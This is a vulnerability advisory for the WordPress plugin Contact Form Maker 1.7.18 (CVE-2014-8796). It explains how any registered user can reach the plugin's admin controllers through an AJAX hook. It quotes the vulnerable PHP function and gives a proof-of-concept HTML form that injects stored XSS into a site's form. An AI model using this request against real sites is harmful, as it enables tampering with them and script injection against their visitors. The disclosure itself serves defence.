Contact Form Maker 1.7.18 XSS

Homepage:

https://wordpress.org/support/plugin/contact-form-maker

CVE-ID

CVE-2014-8796

CVSS Score

3.5

CVSS Vector

(AV:N/AC:M/Au:S/C:P/I:N/A:N)

Description:

form_maker_cfm() is accessible for every registered user (created using wp-login.php?action=register) because of add_action(‘wp_ajax_get_stats_fmc’, ‘form_maker_cfm’)

In this function we can include and run /admin/controllers/FMControllerManage_fmc.php class which is responsible for plugin management.

We can edit any plugin form and add XSS to it using wp-admin/admin-ajax.php, because output is not escaped properly.

File: contact-form-maker\contact-form-maker.php

function form_maker_cfm() {
	require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
	$page = WDW_FMC_Library::get('page');
	if (($page != '') && (($page == 'manage_fmc') || ($page == 'submissions_fmc') || ($page == 'blocked_ips_fmc') || ($page == 'themes_fmc') || ($page == 'licensing_fmc') || ($page == 'featured_plugins_fmc') || ($page == 'uninstall_fmc') || ($page == 'formcontactwindow'))) {
		require_once (WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst(strtolower($page)) . '.php');
		$controller_class = 'FMController' . ucfirst(strtolower($page));
		$controller = new $controller_class();
		$controller->execute();
	}
}

Proof of Concept:

Login as standard user.

This data allows edit form ID=1 and add simple XSS to it:

<form method="post" action="http://wordpress-instalation/wp-admin/admin-ajax.php?action=get_stats_fmc&page=manage_fmc&task=save&current_id=1">
    <input type="text" name="form_front" value="&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

Timeline: